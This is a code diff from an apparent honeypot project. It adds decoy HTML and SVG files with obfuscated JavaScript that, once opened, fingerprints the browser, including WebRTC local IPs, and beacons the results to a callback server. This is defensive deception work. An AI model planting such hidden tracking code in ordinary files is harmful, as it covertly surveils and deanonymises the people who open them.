     "ssh_key": "dns",  # trip is DNS resolution of host comment
     "mysql_dump": "dns",  # trip is DNS resolution of subdomain
+    "fingerprint_html": "http",  # obfuscated JS beacons GET /c/<slug>
+    "fingerprint_svg": "http",  # same, embedded inside SVG <script>
 }
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
     ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
     ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
     ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
+    ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
+    ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
 }
@@ -136,10 +142,12 @@ async def cultivate(
     )

     callback_token = _new_callback_token()
+    http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
+    dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
     ctx = CanaryContext(
         callback_token=callback_token,
-        http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
-        dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
+        http_base=http_base_str,
+        dns_zone=dns_zone_str,
         persona="linux",  # all our deckies are POSIX in MVP
     )
     generator = get_generator(gen_name)
@@ -154,7 +162,7 @@ async def cultivate(
     # attribute a callback if the artifact trips during the plant
     # itself (improbable but possible — DOCX viewers can preview
     # autoplay-style).
-    await repo.create_canary_token({
+    token_data: dict = {
         "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
         "decky_name": plan.decky_name,
         "instrumenter": None,
@@ -165,7 +173,10 @@ async def cultivate(
         "placed_at": datetime.now(timezone.utc),
         "created_by": created_by,
         "state": "planted",
-    })
+    }
+    if artifact.fingerprint_nonce is not None:
+        token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
+    await repo.create_canary_token(token_data)

     # Carry the placement_path on the artifact so the orchestrator's
     # plant_file call uses it. We don't mutate the generator's


@@ -131,7 +131,7 @@ def _build_response(
     question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)

     answer = b""
-    if an_count:
+    if an_count and answer_ip is not None:
         # Use a name pointer back to the question (offset 12).
         ptr = struct.pack("!H", 0xC000 | 12)
         rdata = bytes(int(o) for o in answer_ip.split("."))
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
         self._answer_ip = answer_ip
         self._transport: Optional[asyncio.DatagramTransport] = None

-    def connection_made(self, transport) -> None:  # type: ignore[override]
-        self._transport = transport  # type: ignore[assignment]
+    def connection_made(self, transport) -> None:
+        self._transport = transport

-    def datagram_received(  # type: ignore[override]
+    def datagram_received(
         self, data: bytes, addr: Tuple[str, int],
     ) -> None:
         try:
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
             return
         # Known name — answer with our sinkhole IP, then fire the hook.
         self._send(addr, _build_response(query, answer_ip=self._answer_ip))
-        asyncio.create_task(self._hook(slug, query, addr[0]))
+        asyncio.ensure_future(self._hook(slug, query, addr[0]))

     def _slug_for(self, qname: str) -> Optional[str]:
         if not self._zone or not qname.endswith(self._suffix):
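The answer section built in `_build_response` relies on DNS name compression: `0xC000 | 12` is a pointer back to the question name, which starts at byte offset 12, right after the fixed 12-byte header. The following is a minimal sketch of packing a single A-record answer that way. `build_a_answer` and its default TTL are assumptions made for this example, not the module's actual code.

```python
import struct

DNS_HEADER_LEN = 12  # fixed-size DNS header; the question name starts here


def build_a_answer(answer_ip: str, ttl: int = 60) -> bytes:
    """Pack one A-record answer whose NAME is a pointer to the question."""
    # Top two bits set mark a compression pointer; low 14 bits are the offset.
    ptr = struct.pack("!H", 0xC000 | DNS_HEADER_LEN)
    rdata = bytes(int(octet) for octet in answer_ip.split("."))
    if len(rdata) != 4:
        raise ValueError(f"not an IPv4 address: {answer_ip!r}")
    # TYPE=A (1), CLASS=IN (1), TTL, RDLENGTH, followed by the address bytes.
    fixed = struct.pack("!HHIH", 1, 1, ttl, len(rdata))
    return ptr + fixed + rdata


answer = build_a_answer("192.0.2.10")
```

The pointer keeps the answer at a fixed 16 bytes regardless of how long the queried name is, which is convenient for a sinkhole that always returns the same address.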


@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
     "honeydoc_docx",
     "honeydoc_pdf",
     "mysql_dump",
+    "fingerprint_html",
+    "fingerprint_svg",
 )

 KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
     if name == "mysql_dump":
         from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
         return MySQLDumpGenerator()
+    if name == "fingerprint_html":
+        from decnet.canary.generators.fingerprint_html import (
+            FingerprintHtmlGenerator,
+        )
+        return FingerprintHtmlGenerator()
+    if name == "fingerprint_svg":
+        from decnet.canary.generators.fingerprint_svg import (
+            FingerprintSvgGenerator,
+        )
+        return FingerprintSvgGenerator()
     raise ValueError(
         f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
     )


@@ -0,0 +1,291 @@
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
// canary, harvests browser primitives, and beacons the result back to the
// canary worker. Ported from canary-self-test.html with the rendering UI
// stripped out.
//
// Three placeholders are substituted by the Python builder BEFORE
// javascript-obfuscator runs:
//
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
//
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
// then a fingerprint payload sent as a base64-URL query param on a second
// GET so the existing worker records the hit even before step-4 POST
// support lands. Both fail-open: any error short-circuits to next step.
(async function () {
var BEACON_URL = "{{BEACON_URL}}";
var MINT_UUID = "{{MINT_UUID}}";
var MINT_NONCE = "{{MINT_NONCE}}";
var fp = { mint: MINT_UUID };
function fire(url) {
try {
var img = new Image();
img.src = url;
} catch (e) { /* swallow */ }
}
// 1) bare-open beacon — fires regardless of whether the rest succeeds
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
function sha256(str) {
var buf = new TextEncoder().encode(str);
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
return Array.from(new Uint8Array(h))
.map(function (b) { return b.toString(16).padStart(2, "0"); })
.join("");
});
}
// navigator
try {
fp.nav = {
ua: navigator.userAgent,
pl: navigator.platform,
lg: navigator.language,
lgs: (navigator.languages || []).join(","),
ck: navigator.cookieEnabled,
dnt: navigator.doNotTrack,
hc: navigator.hardwareConcurrency,
dm: navigator.deviceMemory || null,
tp: navigator.maxTouchPoints,
wd: navigator.webdriver === true,
pdf: navigator.pdfViewerEnabled || null,
};
} catch (e) { fp.nav = { err: String(e) }; }
// screen
try {
fp.scr = {
w: screen.width, h: screen.height,
aw: screen.availWidth, ah: screen.availHeight,
cd: screen.colorDepth, pd: screen.pixelDepth,
dpr: window.devicePixelRatio,
iw: window.innerWidth, ih: window.innerHeight,
or: (screen.orientation && screen.orientation.type) || null,
};
} catch (e) { fp.scr = { err: String(e) }; }
// tz / locale
try {
var dtf = Intl.DateTimeFormat().resolvedOptions();
fp.tz = {
z: dtf.timeZone, lc: dtf.locale,
ca: dtf.calendar, ns: dtf.numberingSystem,
off: new Date().getTimezoneOffset(),
};
} catch (e) { fp.tz = { err: String(e) }; }
// connection
try {
var c = navigator.connection;
fp.cn = c ? {
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
} : null;
} catch (e) { fp.cn = { err: String(e) }; }
// canvas
try {
var cv = document.createElement("canvas");
cv.width = 280; cv.height = 60;
var ctx = cv.getContext("2d");
ctx.textBaseline = "top";
ctx.font = "14px Arial";
ctx.fillStyle = "#f60";
ctx.fillRect(125, 1, 62, 20);
ctx.fillStyle = "#069";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
ctx.fillStyle = "rgba(102,204,0,0.7)";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
var dataURL = cv.toDataURL();
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
} catch (e) { fp.cv = { err: String(e) }; }
// webgl
try {
var gc = document.createElement("canvas");
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
if (gl) {
var ext = gl.getExtension("WEBGL_debug_renderer_info");
fp.gl = {
v: gl.getParameter(gl.VENDOR),
r: gl.getParameter(gl.RENDERER),
ver: gl.getParameter(gl.VERSION),
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
};
} else { fp.gl = { err: "unavailable" }; }
} catch (e) { fp.gl = { err: String(e) }; }
// audio
try {
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
if (ACtx) {
var actx = new ACtx(1, 44100, 44100);
var osc = actx.createOscillator();
var cmp = actx.createDynamicsCompressor();
osc.type = "triangle"; osc.frequency.value = 10000;
cmp.threshold.value = -50; cmp.knee.value = 40;
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
osc.connect(cmp); cmp.connect(actx.destination);
osc.start(0);
var buf = await actx.startRendering();
var data = buf.getChannelData(0).slice(4500, 5000);
var sum = 0;
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
} else { fp.au = { err: "unavailable" }; }
} catch (e) { fp.au = { err: String(e) }; }
// fonts
try {
var bases = ["monospace", "sans-serif", "serif"];
var tests = [
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
"San Francisco", "Helvetica Neue", "Lucida Grande",
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
"Noto Sans", "Noto Mono",
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
"Malgun Gothic", "Noto Sans CJK",
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
"Bahnschrift", "Cyberpunk",
];
var sp = document.createElement("span");
sp.style.fontSize = "72px";
sp.style.position = "absolute";
sp.style.left = "-9999px";
sp.innerHTML = "mmmmmmmmmmlli";
document.body.appendChild(sp);
var bs = {};
for (var bi = 0; bi < bases.length; bi++) {
sp.style.fontFamily = bases[bi];
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
}
var det = [];
for (var ti = 0; ti < tests.length; ti++) {
for (var bj = 0; bj < bases.length; bj++) {
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
if (sp.offsetWidth !== bs[bases[bj]].w ||
sp.offsetHeight !== bs[bases[bj]].h) {
det.push(tests[ti]); break;
}
}
}
document.body.removeChild(sp);
fp.ft = {
h: await sha256(det.slice().sort().join(",")),
n: det.length, t: tests.length, d: det,
};
} catch (e) { fp.ft = { err: String(e) }; }
// webrtc local ip leak
try {
var ips = {}; var cands = [];
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
window.mozRTCPeerConnection;
if (RPC) {
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
pc.createDataChannel("");
pc.onicecandidate = function (e) {
if (!e.candidate) return;
cands.push(e.candidate.candidate);
var m = e.candidate.candidate.match(
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
if (m) ips[m[1]] = 1;
};
var off = await pc.createOffer();
await pc.setLocalDescription(off);
await new Promise(function (r) { setTimeout(r, 1500); });
pc.close();
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
} else { fp.rtc = { err: "unavailable" }; }
} catch (e) { fp.rtc = { err: String(e) }; }
// battery
try {
if (navigator.getBattery) {
var bat = await navigator.getBattery();
fp.bt = {
c: bat.charging, l: bat.level,
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
};
} else { fp.bt = { err: "unavailable" }; }
} catch (e) { fp.bt = { err: String(e) }; }
// perf timing jitter
try {
var samples = [];
for (var pi = 0; pi < 1000; pi++) {
var pa = performance.now();
var x = 0;
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
samples.push(performance.now() - pa);
}
samples.sort(function (a, b) { return a - b; });
fp.pf = {
med: samples[500].toFixed(4),
p95: samples[950].toFixed(4),
mn: samples[0].toFixed(4),
mx: samples[999].toFixed(4),
};
} catch (e) { fp.pf = { err: String(e) }; }
// permissions
try {
if (navigator.permissions) {
var names = ["geolocation", "notifications", "camera", "microphone",
"persistent-storage", "clipboard-read", "clipboard-write"];
var st = {};
for (var ni = 0; ni < names.length; ni++) {
try {
var r = await navigator.permissions.query({ name: names[ni] });
st[names[ni]] = r.state;
} catch (e) { st[names[ni]] = "unsupported"; }
}
fp.pm = st;
} else { fp.pm = { err: "unavailable" }; }
} catch (e) { fp.pm = { err: String(e) }; }
// composite identity hash — stable inputs only
try {
var stable = [
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
fp.scr && (fp.scr.w + "x" + fp.scr.h),
].filter(Boolean).join("|");
fp.id = await sha256(stable);
} catch (e) { fp.id = { err: String(e) }; }
// 2) ship the payload as base64url JSON on a GET query param.
// The current worker records the hit on /c/<slug>; step-4 worker
// will decode ?d= and persist the fingerprint blob.
try {
var json = JSON.stringify(fp);
var b64 = btoa(unescape(encodeURIComponent(json)))
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
// chunk if URL would exceed safe limit (~6KB)
var MAX = 6000;
if (b64.length <= MAX) {
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
} else {
var sid = (Math.random() * 1e9 | 0).toString(36);
var total = Math.ceil(b64.length / MAX);
for (var ci = 0; ci < total; ci++) {
var part = b64.substr(ci * MAX, MAX);
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
}
}
} catch (e) { /* swallow */ }
})();
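
The receiving side of this encoding can be sketched in Python. This is a minimal sketch, not the worker's actual code: it assumes chunks for one session id have already been collected into a dict keyed by chunk index, and `decode_b64url_json` and `reassemble_chunks` are hypothetical names introduced here for illustration.

```python
import base64
import json
from typing import Optional


def decode_b64url_json(data: str) -> dict:
    """Decode unpadded base64url text into a JSON object."""
    # The payload strips trailing '=' padding, so restore it before decoding.
    padded = data + "=" * (-len(data) % 4)
    raw = base64.urlsafe_b64decode(padded)
    return json.loads(raw.decode("utf-8"))


def reassemble_chunks(chunks: dict[int, str], total: int) -> Optional[dict]:
    """Join chunks 0..total-1 in index order; return None if any is missing."""
    # Hypothetical helper: the real worker may store and join chunks differently.
    if set(chunks) != set(range(total)):
        return None
    return decode_b64url_json("".join(chunks[i] for i in range(total)))
```

Because the payload slices the base64url string rather than the JSON, a chunk cannot be decoded on its own; only the joined string is guaranteed to decode.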


@@ -0,0 +1,140 @@
"""HTML fingerprint canary — plausible-looking page with an obfuscated
browser-fingerprinting payload inlined at the bottom of ``<body>``.
The visible content is a deliberately mundane "internal directory"
table — the kind of file a curious attacker pulls off a decky's
filesystem and opens locally to triage. When the file is opened in
*any* network-connected browser the obfuscated payload runs and beacons
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
battery, timing jitter, permissions, composite identity hash).
Determinism: the mint UUID is derived from the callback token via
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
output, satisfying the generator contract in :mod:`decnet.canary.base`.
The obfuscator's seed and polymorphic config bits are likewise
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
"""
from __future__ import annotations
import hashlib
import uuid
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
def _mint_uuid_for(callback_token: str) -> str:
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
def _stable_int(callback_token: str, salt: str = "") -> int:
"""Deterministic non-negative int derived from the callback token.
``builtins.hash`` is salted per-process — useless for a generator
that must be byte-identical across runs. SHA-256 prefix is
overkill but free.
"""
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
return int.from_bytes(h[:4], "big")
_PAGE_TEMPLATE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Internal Asset Directory</title>
<style>
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
margin:24px;font-size:13px}}
h1{{font-size:18px;margin:0 0 4px 0}}
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
table{{border-collapse:collapse;width:100%;background:#fff;
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
th{{background:#f4f4f4;font-weight:600;font-size:11px;
text-transform:uppercase;letter-spacing:.5px;color:#555}}
tr:hover td{{background:#fafbff}}
.foot{{margin-top:16px;color:#999;font-size:11px}}
</style>
</head>
<body>
<h1>Internal Asset Directory</h1>
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
<table>
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
{rows}
</table>
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
<script>{payload}</script>
</body>
</html>
"""
_ROW_POOL = (
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
)
def _build_rows(callback_token: str) -> tuple[str, int]:
pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
take = 5 + (_stable_int(callback_token, "take") % 4)
selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
cells = "\n".join(
"<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
for row in selected
)
return cells, len(selected)
def _sync_label(callback_token: str) -> str:
day = _stable_int(callback_token, "day") % 28 + 1
hour = _stable_int(callback_token, "hour") % 24
return f"2026-04-{day:02d} {hour:02d}:14 UTC"
class FingerprintHtmlGenerator(CanaryGenerator):
"""Synthesise an HTML page that fingerprints the browser opening it."""
name = "fingerprint_html"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
rows, row_count = _build_rows(ctx.callback_token)
body = _PAGE_TEMPLATE.format(
sync_label=_sync_label(ctx.callback_token),
row_count=row_count,
rows=rows,
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 14,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)
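
The determinism claim in the module docstring can be checked in isolation. The following is a minimal sketch that copies the SHA-256 derivation and the namespace UUID from the file above so it runs on its own; `row_window` and the sample token are hypothetical, introduced only to show that the same token always selects the same rows and the same mint UUID.

```python
import hashlib
import uuid

# Copied from the generator above so the sketch is self-contained.
MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")


def stable_int(callback_token: str, salt: str = "") -> int:
    """Process-independent integer derived from the token and a salt."""
    digest = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
    return int.from_bytes(digest[:4], "big")


def row_window(callback_token: str, pool_size: int = 9) -> list[int]:
    """Indices of the pool rows a token selects: a wrapped run of 5 to 8 rows."""
    start = stable_int(callback_token, "pick") % pool_size
    take = 5 + (stable_int(callback_token, "take") % 4)
    return [(start + i) % pool_size for i in range(take)]


token = "example-token"  # hypothetical value, not a real callback token
assert row_window(token) == row_window(token)
assert uuid.uuid5(MINT_NAMESPACE, token) == uuid.uuid5(MINT_NAMESPACE, token)
```

Unlike `hash()` on strings, neither derivation depends on `PYTHONHASHSEED`, so the results hold across interpreter runs.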


@@ -0,0 +1,88 @@
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
that runs the obfuscated fingerprinter when the file is opened directly
in a browser.
SVG ``<script>`` only fires when the SVG is loaded as a top-level
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
SVG is referenced from another page's ``<img>``. That's the right
posture for canary use: an attacker browsing the decky filesystem and
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
inside a sandboxed CMS preview does not.
Same determinism guarantees as :mod:`fingerprint_html`.
"""
from __future__ import annotations
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
<style>
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
</style>
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
<path class="edge" d="M160 105 L240 105"/>
<path class="edge" d="M360 105 L440 105"/>
<path class="edge" d="M300 130 L300 220"/>
<script type="application/ecmascript"><![CDATA[
{payload}
]]></script>
</svg>
"""
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
class FingerprintSvgGenerator(CanaryGenerator):
"""Synthesise an SVG that fingerprints the browser opening it."""
name = "fingerprint_svg"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
day = _stable_int(ctx.callback_token, "day") % 28 + 1
body = _DIAGRAM_TEMPLATE.format(
region=region,
ver=ver,
review=f"2026-03-{day:02d}",
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 30,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)
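
One property of the CDATA embedding is worth guarding: a payload containing the sequence `]]>` would end the CDATA section early and leave the SVG malformed. The sketch below shows one way to check for that before formatting the template. It is an assumption about a possible safeguard, not something the generator above does; `SVG_SHELL`, `embed_in_svg`, and `is_well_formed` are hypothetical names, and the shell is a cut-down stand-in for the real template.

```python
import xml.etree.ElementTree as ET

# Cut-down stand-in for the diagram template; only the script wrapper matters here.
SVG_SHELL = (
    '<svg xmlns="http://www.w3.org/2000/svg">'
    '<script type="application/ecmascript"><![CDATA[\n{payload}\n]]></script>'
    "</svg>"
)


def embed_in_svg(payload: str) -> str:
    """Wrap a script payload in CDATA, refusing input that would close it early."""
    if "]]>" in payload:
        raise ValueError("payload contains ']]>' and would end the CDATA section early")
    return SVG_SHELL.format(payload=payload)


def is_well_formed(svg_text: str) -> bool:
    """Return True if the text parses as XML."""
    try:
        ET.fromstring(svg_text.encode("utf-8"))
    except ET.ParseError:
        return False
    return True
```

Characters such as `<` and `&` are safe inside CDATA, so the terminator sequence is the only case this check needs to cover.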


@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
def generate(self, ctx: CanaryContext) -> CanaryArtifact: def generate(self, ctx: CanaryContext) -> CanaryArtifact:
try: try:
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found] from pikepdf import Pdf, Name, Dictionary, String
except ImportError as e: except ImportError as e:
raise InstrumenterRejectedError( raise InstrumenterRejectedError(
"honeydoc_pdf requires pikepdf; install it (`pip install " "honeydoc_pdf requires pikepdf; install it (`pip install "


@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str, self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact: ) -> CanaryArtifact:
try: try:
from PIL import Image, PngImagePlugin # type: ignore[import-not-found] from PIL import Image, PngImagePlugin
except ImportError as e: except ImportError as e:
raise InstrumenterRejectedError( raise InstrumenterRejectedError(
"image instrumenter requires Pillow; install it (`pip " "image instrumenter requires Pillow; install it (`pip "


@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str, self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact: ) -> CanaryArtifact:
try: try:
import pikepdf # type: ignore[import-not-found] import pikepdf
except ImportError as e: except ImportError as e:
raise InstrumenterRejectedError( raise InstrumenterRejectedError(
"PDF instrumenter requires pikepdf; install it (`pip " "PDF instrumenter requires pikepdf; install it (`pip "

decnet/canary/obfuscator.py Normal file

@@ -0,0 +1,177 @@
"""Per-mint JS obfuscator wrapper.
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
Used by the fingerprint generators / instrumenters to produce a unique,
hard-to-statically-analyse JS blob per canary mint.
Two design choices flow from the canary contract in :mod:`base`:
* **Determinism.** Generators must return byte-identical artifacts for
the same ``(callback_token, http_base, dns_zone, persona)``. We
derive a numeric seed from the callback token and pass it to the
obfuscator's own ``seed`` option, and we derive the polymorphic
config bits from the same hash so a re-mint reproduces exactly.
* **Per-mint uniqueness.** Two different callback tokens produce
structurally different output: different identifier names, different
string-array rotation, optionally different transforms enabled.
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
We pass code+options as JSON on stdin and read the obfuscated result
from stdout. Stderr surfaces obfuscator failures.
"""
from __future__ import annotations
import hashlib
import hmac
import json
import os
import subprocess # nosec B404 — Node helper exec is the whole point
from pathlib import Path
from typing import Any
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
# specific runtime; default to PATH lookup.
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
# Hard timeout for the obfuscator subprocess. Real runs on the
# fingerprint payload sit well under 5s on a dev box.
_TIMEOUT_S = 30
class ObfuscatorError(RuntimeError):
"""Raised when the Node helper fails or returns empty output."""
class FingerprintSecretMissing(RuntimeError):
"""Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
Fingerprint canaries embed a per-mint nonce derived from this
server-side secret; without it the worker cannot validate incoming
fingerprint beacons, so we fail loud at mint time rather than ship
a defeatable canary.
"""
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
def nonce_for(callback_token: str, mint_uuid: str) -> str:
"""Compute the per-mint fingerprint nonce.
HMAC-SHA256 keyed on the server-side master secret, message is
``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars
(64 bits), enough to defeat slug-only forgery while fitting
comfortably into a query string.
"""
secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
if not secret:
raise FingerprintSecretMissing(
